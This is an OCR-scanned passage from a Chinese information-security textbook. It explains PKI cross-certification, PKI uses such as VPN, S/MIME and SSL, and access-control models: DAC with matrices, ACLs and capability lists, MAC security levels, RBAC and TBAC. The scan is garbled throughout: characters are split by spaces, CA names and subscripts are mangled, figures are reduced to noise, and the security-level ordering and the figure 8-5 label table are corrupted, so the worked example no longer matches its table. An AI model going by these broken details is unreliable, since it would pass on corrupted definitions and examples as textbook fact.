图 7-13 以 用 户 为 中 心 的 信任 模型 


5) 交叉 认证 模型 

交叉 认证 模型 是 一 种 把 各 个 CA 连接 在 一 起 的 机 制 ,可 以 是 单 向 的 ,如 在 CA 的 严格 层 
次 结构 中 ,上 层 CA 对 下 层 的 认证 ; 也 可 以 是 双向 的 ,如 在 分 布 式 信任 结构 的 中 心 辐射 配置 
中 , 根 CA 与 中 心 CA 的 相互 认证 。 

在 两 个 CA 之 间 的 交叉 认证 是 指 ,一 个 CA 承认 另 一 个 CA 在 一 个 名 字 空 间 中 被 授权 
颁发 的 证 书 , 如 图 7-14 所 示 。 

例如 假设 实体 A 已 经 被 CA; 认证 并 且 拥 有 CA 的 公 钥 ,而 实体 B 已 被 CAs 认证 并 
且 拥 有 CA， 的 公 钥 各。 在 交叉 认证 前 ,A 只 能 验证 CA; 颁发 的 证 书 ,而 不 能 验证 CA， 颁发 
的 证 书 ; 而 也 则 只 能 验证 CA， 颁发 的 证 书 ,不 能 验证 CA 颁发 的 证 书 。 在 CA! 和 CA, 互 
相交 叉 认 证 后 ,A 就 能 验证 CA; 的 公 钥 ,从 而 验证 CA， 颁发 的 证 书 ; B 也 能 验证 CA; 的 公 


钥 从 而 验证 CA 颁发 的 证 书 。 


OE Cr 
GD CD GD CD 
用 户 用 户 用 户 用 户 用 户 


图 7-14 交叉 认证 模型 


7. PKI 应 用 


PKI 技术 的 广泛 应 用 能 满足 人 们 对 网 络 交易 安全 保障 的 需求 。 当 然 ,作为 一 种 基础 设 
施 ,PKI 的 应 用 范围 非常 广泛 ,并 且 在 不 断 发 展 之 中 ,下 面 给 出 几 个 应 用 实例 。 

1) 虚拟 专用 网 络 (VPN) 

VPN 是 一 种 架构 在 公用 通信 基础 设施 上 的 专用 数据 通信 和 网络 ,利用 网 络 层 安 全 协议 
(尤其 是 IPSec) 和 建立 在 PKI 上 的 加 密 与 签名 技术 来 获得 机 密 性 保护 。 基 于 PKI 技术 的 
IPSec 协议 现在 已 经 成 为 架构 VPN 的 基础 , 它 可 以 为 路 由 器 之 间 、 防 火 墙 之 间或 者 路 由 器 
和 防火 墙 之 间 提 供 经 过 加 密 和 认证 的 通信 。 虽 然 它 的 实现 会 复杂 一 些 , 但 其 安全 性 比 其 他 
协议 都 完善 得 多 。 

2) 安全 电子 邮件 

随 着 Internet 的 持续 增长 ,商业 机 构 或 政府 机 构 都 开始 用 电子 邮件 交换 一 些 秘密 的 或 
是 有 商业 价值 的 信息 ,这 就 引出 了 一 些 安全 方面 的 问题 ,包括 : 消息 和 附件 可 以 在 不 为 通信 
双方 所 知 的 情况 下 被 读 取 、 算 改 或 截 掉 ; 发 信人 的 身份 无 法 确认 。 电 子 邮件 的 安全 需求 也 
是 机 密 性 、 完 整 性 ,认证 和 不 可 否认 性 ,而 这 些 都 可 以 利用 PKI 技术 来 获得 。 

目前 发 展 很 快 的 安全 电子 邮件 协议 是 S/MIME (The Secure Multipurpose Internet 
Mail Extension) ,这 是 一 个 允许 发 送 加 密 和 有 签名 邮件 的 协议 。 该 协议 的 实现 需要 依赖 于 
PKI 技术 。 

3) Web 安全 

为 了 透明 地 解决 Web 的 安全 问题 ,在 两 个 实体 进行 通信 之 前 , 先 要 建立 SSL 连接 ,以 
此 实现 对 应 用 层 透明 的 安全 通信 。 利 用 PKI 技术 ,SSL 协议 允许 在 浏览 器 和 服务 器 之 间 进 
行 加 密 通 信 。 此 外 服务 器 端 和 浏览 器 端 通信 时 双方 可 以 通过 数字 证 书 确认 对 方 的 身份 。 结 
合 SSL 协议 和 数字 证 书 ,PKI 技术 可 以 保证 Web 交易 多 方面 的 安全 需求 ,使 Web 上 的 交易 
和 面对面 的 交易 一 样 安全 。 

从 目前 的 发 展 来 说 ,PKI 的 范围 非常 广 ,而 不 仅仅 局 限于 通常 认为 的 CA 机 构 , 它 还 包 
括 完 整 的 安全 策略 和 安全 应 用 。 因 此 ,PKI 的 开发 也 从 传统 的 身份 认证 到 各 种 与 应 用 相关 
的 安全 场合 ,如 企业 安全 电子 商务 和 政府 的 安全 电子 政务 等 。 

另外 ,PKI 的 开发 也 从 大 型 的 认证 机 构 到 与 企业 或 政府 应 用 相关 的 中 小 型 PKI 系统 发 
展 , 既 保持 了 兼容 性 ,又 和 特定 的 应 用 相关 。 


访问 控制 


访问 控制 是 网 络 安全 防范 和 保护 的 主要 策略 之 一 , 它 的 主要 任务 是 保证 网 络 资源 不 被 
非法 访问 和 使 用 。 访 问 控制 规定 了 主体 对 客体 访问 的 限制 ,并 在 身份 认证 的 基础 上 ,根据 身 
份 对 提出 资源 访问 的 请 求 加 以 控制 。 它 是 对 信息 系统 资源 进行 保护 的 重要 措施 ,也 是 计算 
机 系统 最 重要 和 最 基础 的 安全 机 制 。 它 是 一 种 加 强 授权 的 方法 ,这 个 授权 是 指 资源 的 所 有 
者 或 控制 者 准许 其 他 人 访问 这 种 资源 。 这 些 资源 包含 信息 资源 .处 理 资源 .通信 资源 和 物理 
资源 ,访问 一 种 资源 意味 着 从 这 个 资源 中 得 到 信息 、 修 改 资源 或 者 使 它 完成 某 种 功能 。 


81 访问 控制 概述 


访问 控制 是 信息 安全 保障 机 制 的 重要 内 容 , 它 是 实现 数据 保密 性 和 完整 性 机 制 的 主要 
手段 之 一 。 访 问 控制 是 为 了 限制 访问 主体 (或 称 为 发 起 者 ,是 一 个 主动 的 实体 ,如 用 户 、 进 
程 、 服 务 等 ) 对 访问 客体 (需要 保护 的 资源 ?的 访问 权限 ,从 而 使 计算 机 系统 在 合法 范围 内 使 
用 。 访 问 控制 机 制 决定 用 户 及 代表 一 定 用 户 利益 的 程序 能 做 什么 ,以 及 做 到 什么 程度 。 
访问 控制 由 两 个 重要 过 程 组 成 。 其 一 ,通过 认证 来 检验 主体 的 合法 身份 ; 其 二 ,通过 授 
权 (Authorization) 来 限制 用 户 对 资源 的 访问 级 别 。 访 问 包括 读 取 数 据 , 更 改 数据 ,运行 程 
下 面 介 绍 几 个 访问 控制 的 最 基本 概念 。 


1. 主体 (Subject) 


主体 是 指 主动 的 实体 ,是 访问 的 发 起 者 , 它 造成 了 信息 的 流动 和 系统 状态 的 改变 ,主体 
通常 包括 人 、 进 程 和 设备 。 根 据 主体 权限 不 同 可 以 分 为 四 类 : 

(1) 特殊 用 户 : 系统 管理 员 , 具 有 最 高 级 别 的 特权 ,可 以 访问 任何 资源 ,并 具有 任何 类 
型 的 访问 操作 能 力 。 

(2) 一 般 用 户 : 最 大 的 一 类 用 户 , 他 们 的 访问 操作 受到 一 定 的 限制 ,由 系统 管理 员 
分 配 。 

(3) 审计 用 户 : 负责 整个 安全 系统 范围 内 的 安全 控制 与 资源 使 用 情况 的 审计 。 

(4) 作废 的 用 户 ; 被 系统 拒绝 的 用 户 。 


第 8 章 ”访问 控制 


2. 客体 (Object) 


客体 是 指 包含 或 接受 访问 的 被 动 实体 ,客体 在 信息 流动 中 的 地 位 是 被 动 的 ,是 处 于 主体 
的 作用 之 下 ,对 客体 的 访问 意味 着 对 其 中 所 包含 信息 的 访问 。 客 体 通 常 包 括 文件 和 文件 系 
统 ,磁盘 和 磁带 卷 标 、 远 程 终端 ,信息 管理 系统 的 事务 处 理 及 其 应 用 数据 库 中 的 数据 、 应 用 


3. 访问 (Access) 
访问 是 使 信息 在 主体 (Subject) 和 客体 (Object) 之 间 流 动 的 一 种 交互 方式 。 
4. 访问 许可 (Access Permissions) 


访问 控制 决定 了 谁 能 够 访问 系统 ,能 访问 系统 的 何 种 资源 以 及 如 何 使 用 这 些 资源 。 适 
当 的 访问 控制 能 够 阻止 未 经 允许 的 用 户 有 意 或 无 意 地 获取 数据 。 访 问 控制 的 手段 包括 用 户 
识别 代码 .口令 .登录 控制 资源 授权 (例如 用 户 配置 文件 ,资源 配置 文件 和 控制 列表 ) ,授权 
核查 .日 志和 审计 等 。 


5. 控制 策略 


控制 策略 是 主体 对 客体 的 访问 规则 集 ,这 个 规则 集 直接 定义 了 主体 对 客体 的 作用 行为 
和 客体 对 主体 的 条 件 约束 。 访 问 策略 体现 了 一 种 授权 行为 ,也 就 是 客体 对 主体 的 权限 允许 ， 
这 种 允许 不 超越 规则 集中 的 定义 。 

访问 控制 在 信息 系统 中 应 用 非常 广泛 ,例如 对 用 户 的 网 络 接 和 人 过 程 进行 控制 .操作 系统 
中 控制 用 户 对 文件 系统 和 底层 设备 的 访问 。 另 外 当 需 要 提供 更 细 粒 度 的 数据 访问 控制 时 ， 
可 以 在 应 用 程序 中 实现 基于 数据 记录 或 更 小 的 数据 单元 访问 控制 。 例 如 大 多 数 数据 库 ( 如 
Oracle) 都 提供 独立 于 操作 系统 的 访问 控制 机 制 ,Oracle 使 用 其 内 部 用 户 数据 库 , 且 数据 库 
中 的 每 个 表 都 有 自己 的 访问 控制 策略 来 支配 对 其 记录 的 访问 。 


82 访问 控制 策略 


访问 控制 系统 一 般 包括 主体 、 客 体 ,以 及 为 识别 和 验证 这 些 实体 的 子 系统 和 控制 实体 间 
访问 的 参考 监视 器 。 由 于 网 络 传输 的 需要 ,访问 控制 的 研究 发 展 很 快 ,有 许多 访问 控制 策略 
被 提出 来 。 

1985 年 美国 军 方 提出 可 信 计 算 机 系统 评估 准则 TCSEC, 其 中 描述 了 两 种 著名 的 访问 
控制 策略 : 自主 访问 控制 和 强制 访问 控制 。 基 于 角色 的 访问 控制 (RBAC) 由 Ferraiolo 和 
Kuhn 在 1992 年 提出 的 。 考 虑 到 网 络 安 全 和 传输 流 , 又 提出 了 基于 对 象 和 基于 任务 的 访问 
控制 。 

各 种 访问 控制 策略 之 间 并 不 相互 排斥 ,现存 计算 机 系统 中 通常 都 是 多 种 访问 控制 策略 
并 存 , 系 统管 理 员 能 够 对 安全 策略 进行 配置 使 其 达到 安全 政策 的 要 求 。 
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821 自主 访问 控制 


自主 访问 控制 (Discretionary Access Control,DAC) 允许 合法 用 户 以 用 户 或 用 户 组 的 
身份 访问 规定 的 客体 ,同时 阻止 非 授 权 用 户 访问 客体 , 某 些 用 户 还 可 以 自主 地 把 自己 所 
拥有 的 客体 的 访问 权限 授予 其 他 用 户 。 自 主 访问 控制 又 称 为 任意 访问 控制 。Linux、 
UNIX、Windows NT/SERVER 版 本 的 操作 系统 都 提供 自主 访问 控制 的 功能 。 在 实现 上 ， 
首先 要 对 用 户 的 身份 进行 鉴别 ,然后 就 可 以 按照 访问 控制 列表 所 赋予 用 户 的 权限 允许 和 
限制 用 户 使 用 客体 的 资源 。 主 体 控制 权限 的 修改 通常 由 特权 用 户 或 是 特权 用 户 ( 管 理 
员 ) 组 实现 。 

自主 访问 控制 的 特点 是 授权 的 实施 主体 (可 以 授权 的 主体 .管理 授权 的 客体 或 授权 
组 ) 自 主 负责 赋予 和 回收 其 他 主体 对 客体 资源 的 访问 权限 。DAC 模型 一 般 采 用 访问 控制 
和 矩阵 和 访问 控制 列表 来 存放 不 同 主体 的 访问 控制 信息 ,从 而 达到 对 主体 访问 权限 的 限制 
目的 。 

由 于 DAC 对 用 户 提供 灵活 和 易 行 的 数据 访问 方式 ,能 够 适用 于 许多 的 系统 环境 ,所 
以 DAC 被 大 量 采用 ,尤其 在 商业 和 工业 环境 的 应 用 上 。 然 而 ,DAC 提供 的 安全 保护 容易 
被 非法 用 户 绕 过 而 获得 访问 。 例 如 , 若 某 用 户 A 有 权 访 问 文件 F, 而 用 户 B 无 权 访问 下 ， 
则 一 旦 A 获取 下 后 再 传送 给 B, 则 B 也 可 访问 F, 其 原因 是 在 自由 访问 策略 中 ,用 户 在 获 
得 文件 的 访问 后 ,并 没有 限制 对 该 文件 信息 的 操作 , 即 并 没有 控制 数据 信息 的 分 发 。 所 
以 DAC 提供 的 安全 性 还 相对 较 低 ,不 能 够 对 系统 资源 提供 充分 的 保护 ,不 能 抵御 特洛伊 
木马 的 攻击 。 

自主 访问 控制 通常 有 三 种 实现 机 制 , 即 访问 控制 矩阵 ` 访 问 控制 列表 和 访问 控制 能 力 
列表 。 


1. 访问 控制 矩阵 


访问 控制 矩阵 (Access Control Matrix) 是 最 初 实现 访问 控制 机 制 的 概念 模型 , 它 利用 
二 维和 矩阵 规定 了 任意 主体 和 任意 客体 间 的 访问 权限 。 和 矩阵 中 的 行 代表 主体 的 访问 权限 属 
性 ,矩阵 中 的 列 代表 客体 的 访问 权限 属性 ,矩阵 中 的 每 一 格 表 示 所 在 行 的 主体 对 所 在 列 的 客 
体 的 访问 授权 ,如 图 8-1 所 示 , 其 中 Own/O 表示 管理 操作 ,R 表示 读 操 作 , W 表示 写 操作 ， 
将 管理 操作 从 读 写 中 分 离 出 来 ,是 因为 管理 员 也 许 会 对 控制 规则 本 身 或 是 文件 的 属性 等 做 
修改 。 


主 全 千 体 | 客体 1 客体 2 客体 3 
主体 1 OwnRW OwnRVW 
主体 2 R OwnRW Ww 
主体 3 RW R 


8-1 访问 控制 矩阵 


访问 控制 的 任务 就 是 确保 系统 的 操作 是 按照 访问 控制 矩阵 授权 的 访问 来 执行 的 , 它 
是 通过 引用 监控 器 协调 客体 对 主体 的 每 次 访问 而 实现 ,这 种 方法 清晰 地 实现 认证 与 访问 
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控制 的 相互 分 离 。 在 较 大 的 系统 中 ,访问 控制 矩阵 将 变 得 非常 巨大 ,而 且 和 矩阵 中 的 许多 
格 可 能 都 为 空 ,造成 很 大 的 存储 空间 浪费 ,因此 在 实际 应 用 中 ,访问 控制 很 少 利用 矩阵 方 
式 实现 。 


2. 访问 控制 列表 


访问 控制 列表 (Access Control Lists,ACLs) 是 以 文件 为 中 心 建立 访问 权限 表 , 表 中 登 
记 了 客体 文件 的 访问 用 户 名 及 访问 权 隶 属 关系 。 利 用 访问 控制 列表 ,能 够 很 容易 地 判断 出 
对 于 特定 客体 的 授权 访问 ,哪些 主体 可 以 访问 并 有 哪些 访问 权限 。 同 样 很 容易 撤销 特定 客 
体 的 授权 访问 ,只 要 把 该 客体 的 访问 控制 列表 置 为 空 即 可 。 

利用 访问 控制 列表 可 以 为 每 个 客体 附加 一 个 可 以 访问 它 的 主体 的 明细 表 , 如 图 8-2 
所 示 。 


Objectl 广 User A UserB UserC 
Own 
R R R 
Ww W 
O O O 


图 8-2 访问 控制 列表 示例 


在 上 图 的 例子 中 ,对 于 客体 Objectl ,主体 A 具有 管理 . 读 和 写 的 权力 ,主体 B 具有 读 和 
写 的 权力 ,主体 C 只 能 读 。 

由 于 访问 控制 列表 的 简单 .实用 ,许多 通用 的 操作 系统 使 用 访问 控制 列表 来 提供 访问 控 
制服 务 。 例 如 UNIX 和 VMS 系统 利用 访问 控制 列表 的 简略 方式 ,允许 以 少量 工作 组 的 形 
式 实 现 访问 控制 列表 ,而 不 允许 单个 的 个 体 出 现 , 这 样 可 以 使 访问 控制 列表 很 小 而 能 够 用 几 
位 就 可 以 和 文件 存储 在 一 起 。 另 一 种 复杂 的 访问 控制 列表 应 用 是 利用 一 些 访问 控制 包 , 通 
过 它 制定 复杂 的 访问 规则 限制 何 时 和 如 何 进行 访问 ,而 且 这 些 规则 根据 用 户 名 和 其 他 用 户 
属性 的 定义 进行 单个 用 户 的 匹配 应 用 。 


3. 访问 控制 能 力 列表 


能 力 是 访问 控制 中 的 一 个 重要 概念 , 它 是 指 请 求 访问 的 发 起 者 所 拥有 的 一 个 有 效 标签 
(Ticket) , 它 授权 标签 的 持 有 者 可 以 按照 何 种 访问 方式 访问 特定 的 客体 。 访 问 控制 能 力 表 
(Access Control Capabilities Lists,ACCLs) 是 以 用 户 为 中 心 建立 访问 权限 表 。 为 每 个 主体 
附加 一 个 该 主体 能 够 访问 的 客体 的 明细 表 。 

能 力 机 制 的 最 大 特点 是 能 力 的 拥有 者 可 以 在 主体 中 转移 能 力 。 在 转移 的 全 部 能 力 中 有 
一 种 能 力 叫 “转移 能 力 ”, 这 个 能 力 允 许 接受 能 力 的 主体 继续 转移 能 力 。 比 如 进程 A 将 某 个 
能 力 转移 给 进程 B,B 又 将 能 力 传递 给 进程 C。 如 果 B 不 想 让 C 继续 转移 这 个 能 力 ,就 在 将 
能 力 转移 给 C 时 去 掉 “ 转 移 能 力 ”, 这 样 C 就 不 能 转移 此 能 力 了 。 主 体 为 了 在 取消 某 能 力 的 
同时 从 所 有 相关 主体 中 彻底 清除 该 能 力 , 需 要 跟踪 所 有 的 转移 。 

一 个 主体 的 访问 控制 能 力 列表 如 图 8-3 所 示 。 
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User A |—=| Objectl Object Object3 
Own 
R R R 
Ww WwW 
0 0 0 


图 8-3 访问 控制 能 力 列表 示例 


822 强制 访问 控制 


强制 访问 控制 (Mandatory Access Control, MAC) 是 比 DAC 更 为 严格 的 访问 控制 策 
略 。 与 DAC 相 比 ,强制 访问 控制 提供 的 访问 控制 机 制 无 法 绕 过 。 在 强制 访问 控制 中 ,每 个 
用 户 及 文件 都 被 赋予 一 定 的 安全 级 别 , 用 户 不 能 改变 自身 或 任何 客体 的 安全 级 别 , 即 不 允许 
单个 用 户 确 定 访问 权限 ,只 有 系统 管理 员 可 以 确定 用 户 和 组 的 访问 权限 。 系 统 通 过 比较 用 
户 和 访问 的 文件 的 安全 级 别 来 决定 用 户 是 否 可 以 访问 该 文件 。 此 外 ,强制 访问 控制 不 允许 
一 个 进程 生成 共享 文件 ,从 而 防止 进程 通过 共享 文件 将 信息 从 一 个 进程 传 到 另 一 进程 。 
MAC 可 通过 使 用 敏感 标签 对 所 有 用 户 和 资源 强制 执行 安全 策略 , 即 实行 强制 访问 控制 。 
安全 级 别 一 般 有 五 级 : 绝密 级 (Top Secret,T) 、 秘 密级 (Secret,S)、 机 密级 (Confidential， 
C) .限制 级 (Restricted,R) 和 无 密级 (Unclassified,U) ,其 中 TS>>C>>R>U。 


用 户 与 访问 的 信息 的 读 写 关系 将 有 四 种 : 


(1) 下 读 (read down): 用 户 级 别 高 于 文件 级 别 的 读 操作 。 


(2) 上 写 (write up): 用 户 级 别 低 于 文件 级 别 的 写 操作 。 
(3) 下 写 (write down) : 用 户 级 别 高 于 文件 级 别 的 写 操作 。 


(4) 上 读 (read up): 用 户 级 别 低 于 文件 级 别 的 读 操作 。 


上 述 读 写 方式 都 保证 了 信息 流 的 单 向 性 ,显然 上 读 和 下 写 方式 保证 了 数据 的 完整 性 ,上 


写 和 下 读 方 式 则 保证 了 信息 的 秘密 性 。 
图 8-4 表示 了 一 个 强制 访问 控制 策略 的 例子 。 


图 8-4 强制 访问 控制 示例 


客体 | |- 谈 取 ? 读 取 ? .| 

导弹 计划 去 

级 别 : 绝密 | ”拒绝 主体: Jack 。 允许 
py 级 别 : 秘密 


客体 2 
电话 短 
级 别 : 限制 


主体 Jack 只 能 读 取 级 别 低 的 文件 ,而 不 能 访问 比 他 级 别 高 的 文件 。 

强制 访问 控制 通常 借助 访问 控制 安全 标签 列表 (Access Control Security Labels Lists) 
来 实现 。 安 全 标签 是 限制 和 附属 在 主体 或 客体 上 的 一 组 安全 属性 信息 。 安 全 标签 的 含义 比 
能 力 更 为 广泛 和 严格 ,因为 它 实 际 上 还 建立 了 一 个 严格 的 安全 等 级 集合 。 访 问 控 制 标 签 列 


表 是 限定 一 个 用 户 对 一 个 客体 目标 访问 的 安全 属性 集合 。 


访问 控制 安全 标签 列表 的 实现 示例 如 图 8-5 所 示 , 左 侧 为 用 户 对 应 的 安全 级 别 , 右 侧 为 
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文件 系统 对 应 的 安全 级 别 。 
用 户 安全 级 别 文件 安全 级 别 
用 户 A S Filel R 
用 户 B ec File2 和 
用 户 X Filen S 


图 8-5 访问 控制 安全 标签 列表 示例 


用 户 A 的 安全 级 别 为 S, 那 么 他 请 求 访问 文件 File 2 时 ,由 于 T>S, 访 问 会 被 拒绝 ; 当 
他 访问 Filel 时 ,由 于 S>R, 所 以 允许 访问 。 


823 基于 角色 的 访问 控制 


基于 角色 的 访问 控制 (Role-Based Access, RBAC) 的 基本 思想 是 将 访问 许可 权 分 配给 
一 定 的 角色 ,用 户 通过 饰演 不 同 的 角色 获得 角色 所 拥有 的 访问 许可 权 。 这 是 因为 在 很 多 实 
际 应 用 中 ,用 户 并 不 是 可 以 访问 的 客体 信息 资源 的 所 有 者 (这 些 信息 属于 企业 或 公司 ) ,这样 
的 话 , 访 问 控制 应 该 基于 员工 的 职务 而 不 是 基于 员工 在 哪个 组 或 谁 是 信息 的 所 有 者 , 即 访问 
控制 是 由 各 个 用 户 在 部 门 中 所 担任 的 角色 来 确定 的 ,例如 ,一 个 学 校 可 以 有 教师 学生 和 其 
他 管理 人 员 等 角色 。 

RBAC 从 控制 主体 的 角度 出 发 ,根据 管理 中 相对 稳定 的 职权 和 责任 来 划分 角色 ,将 访问 
权限 与 角色 相 联 系 ,这 点 与 传统 的 MAC 和 DAC 将 权限 直接 授予 用 户 的 方式 不 同 ; 通过 给 
用 户 分 配合 适 的 角色 ,让 用 户 与 访问 权限 相 联 系 。 角 色 成 为 访问 控制 中 访问 主体 和 受 控 对 
象 之 间 的 一 座 桥梁 。 

角色 可 以 看 做 是 一 组 操作 的 集合 ,不 同 的 角色 具有 不 同 的 操作 集 , 这 些 操 作 集 由 系统 管 
理 员 分 配给 角色 。 在 下 面 的 实例 中 ,我 们 假设 Tchl, Tch2,Tch3,…,Tchi 是 对 应 的 教师 ， 
Stud1,Stud2,Stud3,…,Studj 是 相应 的 学 生 , Mngl1, Mng2, Mng3,… ,Mngk 是 教务 处 管理 
人 员 ,那么 老师 的 权限 为 TchMN 王 {查询 成 绩 、 上 传 所 教 课 程 的 成 绩 }; 学 生 的 权限 为 
StudMN 王 {查询 成 绩 、 反 映 意见 }; 教务 管理 人 员 的 权限 为 MngMN 王 {查询 ,修改 成 绩 \ 打 
印 成 绩 清单 } 。 那 么 ,依据 角色 的 不 同 ,每 个 主体 只 能 执行 自己 所 制定 的 访问 功能 。 用 户 在 
一 定 的 部 门 中 具有 一 定 的 角色 ,其 所 执行 的 操作 与 其 所 扮演 的 角色 的 职能 相 匹配 ,这 正 是 基 
于 角色 的 访问 控制 的 根本 特征 , 即 依据 RBAC 策略 ,系统 定义 了 各 种 角色 ,每 种 角色 可 以 完 
成 一 定 的 职能 ,不 同 的 用 户 根据 其 职能 和 责任 被 赋予 相应 的 角色 ,一旦 某 个 用 户 成 为 某 角色 
的 成 员 , 则 此 用 户 可 以 完成 该 角色 所 具有 的 职能 。 

系统 管理 员 负 责 授予 用 户 各 种 角色 的 成 员 资 格 或 撤销 某 用 户 具 有 的 某 个 角色 。 例 如 学 
校 新 进 一 名 教师 Tchz, 那 么 系统 管理 员 只 需 将 Tchz 添加 到 教师 这 一 角色 的 成 员 中 即 可 ， 
而 无 须 对 访问 控制 列表 做 改动 。 同 一 个 用 户 可 以 是 多 个 角色 的 成 员 , 即 同一 个 用 户 可 以 扮 
演 多 种 角色 ,比如 一 个 用 户 可 以 是 老师 ,同时 也 可 以 作为 进修 的 学 生 。 同 样 ,一 个 角色 可 以 
拥有 多 个 用 户 成 员 , 这 与 现实 是 一 致 的 ,一 个 人 可 以 在 同一 部 门 中 担任 多 种 职务 ,而 且 担任 
相同 职务 的 可 能 不 止 一 人 。 因 此 RBAC 提供 了 一 种 描述 用 户 和 权限 之 间 的 多 对 多 关系 , 角 
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色 可 以 划分 成 不 同 的 等 级 ,通过 角色 等 级 关系 来 反映 一 个 组 织 的 职权 和 责任 关系 ,这 种 关系 
具有 反 身 人 性、 传递 性 和 非 对 称 性 特点 ,通过 继承 行为 形成 了 一 个 偏 序 关 系 ,比如 MngMN> 
TchMN>StudMN。RBAC 中 通常 定义 不 同 的 约束 规则 来 对 模型 中 的 各 种 关系 进行 限制 ， 
最 基本 的 约束 是 “相互 排斥 ”约束 和 * 基 本 限制 ”约束 ,分 别 规定 了 模型 中 的 互 斥 角色 和 一 个 
角色 可 被 分 配 的 最 大 用 户 数 。RBAC 中 引进 了 角色 的 概念 ,用 角色 表示 访问 主体 具有 的 职 
权 和 责任 ,灵活 地 表达 和 实现 了 企业 的 安全 策略 ,使 系统 权限 管理 在 企业 的 组 织 视图 这 个 较 
高 的 抽象 集 上 进行 ,从 而 简化 了 权限 设置 的 管理 ,从 这 个 角度 看 ,RBAC 很 好 地 解决 了 企业 
管理 信息 系统 中 用 户 数 量 多 、 变 动 频繁 的 问题 。 

相 比 较 而 言 ,RBAC 是 实施 面向 企业 的 安全 策略 的 一 种 有 效 的 访问 控制 方式 ,其 具有 灵 
活性 方便 性 和 安全 性 的 特点 ,目前 在 大 型 数据 库 系统 的 权限 管理 中 得 到 普遍 应 用 。 角 色 由 
系统 管理 员 定义 , 角 色 成 员 的 增 减 也 只 能 由 系统 管理 员 来 执行 , 即 只 有 系统 管理 员 有 权 定义 
和 分 配角 色 。 用 户 与 客体 无 直接 联系 ,他 只 有 通过 角色 才 享 有 该 角色 所 对 应 的 权限 ,从 而 访 
问 相应 的 客体 。 因 此 用 户 不 能 自主 地 将 访问 权限 授 给 别 的 用 户 , 这 是 RBAC 与 DAC 的 根 
本 区 别 所 在 。RBAC 与 MAC 的 区 别 在 于 : MAC 是 基于 多 级 安全 需求 的 ,而 RBAC 则 
不 是 。 
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上 述 几 种 访问 控制 都 是 从 系统 的 角度 出 发 去 保护 资源 (控制 环境 是 静态 的 ) ,在 进行 权 
限 的 控制 时 没有 考虑 执行 的 上 下 文 环境 。 数 据 库 、 网 络 和 分 布 式 计算 的 发 展 ,组 织 任务 进 一 
步 自动 化 ,与 服务 相关 的 信息 进一步 计算 机 化 ,这 促使 人 们 将 安全 问题 方面 的 注意 力 从 独立 
的 计算 机 系统 中 静态 的 主体 和 客体 保护 ,转移 到 随 着 任务 的 执行 而 进行 动态 授权 的 保护 上 。 
此 外 ,上 述 访问 控制 不 能 记录 主体 对 客体 权限 的 使 用 ,权限 没有 时 间 限 制 ,只 要 主体 拥有 对 
客体 的 访问 权限 ,主体 就 可 以 无 数 次 地 执行 该 权限 。 考 虑 到 上 述 原因 ,我 们 引入 工作 流 的 概 
念 加 以 阐述 。 工 作 流 是 为 完成 某 一 目标 而 由 多 个 相关 的 任务 (活动 ) 构 成 的 业务 流程 。 工 作 
流 所 关注 的 问题 是 处 理 过 程 的 自动 化 ,对 人 和 其 他 资源 进行 协调 管理 ,从 而 完成 某 项 工作 。 
当 数 据 在 工作 流 中 流动 时 ,执行 操作 的 用 户 在 改变 ,用 户 的 权限 也 在 改变 ,这 与 数据 处 理 的 
上 下 文 环境 相关 。 传 统 的 DAC 和 MAC 访问 控制 技术 , 则 无 法 予以 实现 ,至 于 RBAC, 也 需 
要 频繁 地 更 换 角 色 , 且 不 适合 工作 流程 的 运转 。 这 就 迫使 我 们 必须 考虑 新 的 访问 控制 策略 。 

基于 任务 的 访问 控制 (Task-based Access Control,TBAC) 是 从 应 用 和 企业 层 角度 来 解 
决 安全 问题 ,以 面向 任务 的 观点 ,从 任务 (活动 ) 的 角度 来 实现 安全 机 制 , 在 任务 处 理 的 过 程 
中 提供 动态 实时 的 安全 管理 。 

在 TBAC 中 ,对 象 的 访问 权限 控制 并 不 是 静止 不 变 的 ,而 是 随 着 执行 任务 的 上 下 文 环 
境 发 生变 化 。TBAC 首要 考虑 的 是 在 工作 流 的 环境 中 对 信息 的 保护 问题 : 在 工作 流 环境 
中 ,数据 的 处 理 与 上 一 次 的 处 理 相关 联 , 相 应 的 访问 控制 也 如 此 ,因而 TBAC 是 一 种 上 下 文 
相关 的 访问 控制 。 其 次 ,TBAC 不 仅 能 对 不 同 工 作 流 实行 不 同 的 访问 控制 策略 ,而 且 还 能 
对 同一 工作 流 的 不 同 任务 实例 实行 不 同 的 访问 控制 策略 。 从 这 个 意义 上 说 ,TBAC 是 基于 
任务 的 ,这 也 表明 ,TBAC 是 一 种 基于 实例 (Instance-based) 的 访问 控制 。 

TBAC 模型 由 工作 流 、 授 权 结 构 体 、 受 托 人 集 、 许 可 和 集 四 部 分 组 成 。 
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任务 (Task) 是 工作 流程 中 的 一 个 逻辑 单元 ,是 一 个 可 区 分 的 动作 ,与 多 个 用 户 相 关 , 也 
可 能 包括 几 个 子 任务 。 授 权 结 构 体 是 任务 在 计算 机 中 进行 控制 的 一 个 实例 。 任 务 中 的 子 任 
务 ,对 应 于 授权 结构 体 中 的 授权 步 。 

授权 结构 体 (Authorization Unit) : 是 由 一 个 或 多 个 授权 步 组 成 的 结构 体 ,它们 在 逻辑 
上 是 联系 在 一 起 的 。 授 权 结构 体 分 为 一 般 授 权 结构 体 和 原子 授权 结构 体 。 一 般 授 权 结 构 体 
内 的 授权 步 依次 执行 ,原子 授权 结构 体内 部 的 每 个 授权 步 紧 密 联 系 , 其 中 任何 一 个 授权 步 失 
败 都 会 导致 整个 结构 体 的 失败 。 

授权 步 (Authorization Step) 表 示 一 个 原始 授权 处 理 步 , 是 指 在 一 个 工作 流程 中 对 处 理 
对 象 的 一 次 处 理 过 程 。 授 权 步 是 访问 控制 所 能 控制 的 最 小 单元 ,由 受托 人 集 (Trustee Set) 
和 多 个 许可 集 (Permissions Set) 组 成 。 

受托 人 集 是 可 被 授予 执行 授权 步 的 用 户 的 集合 ,许可 集 则 是 受托 集 的 成 员 被 授予 授权 
步 时 拥有 的 访问 许可 。 当 授权 步 初始 化 以 后 ,一 个 来 自 受 托 人 集中 的 成 员 将 被 授予 授权 步 ， 
我 们 称 这 个 受托 人 为 授权 步 的 执行 委托 者 ,该 受托 人 执行 授权 步 过 程 中 所 需 许 可 的 集合 称 
为 执行 者 许可 集 。 授 权 步 之 间或 授权 结构 体 之 间 的 相互 关系 称 为 依赖 (Dependency) ,依赖 
反映 了 基于 任务 的 访问 控制 的 原则 。 授 权 步 的 状态 变化 一 般 自我 管理 ,依据 执行 的 条 件 而 
自动 变迁 状态 ,但 有 时 也 可 以 由 管理 员 进 行 调配 。 

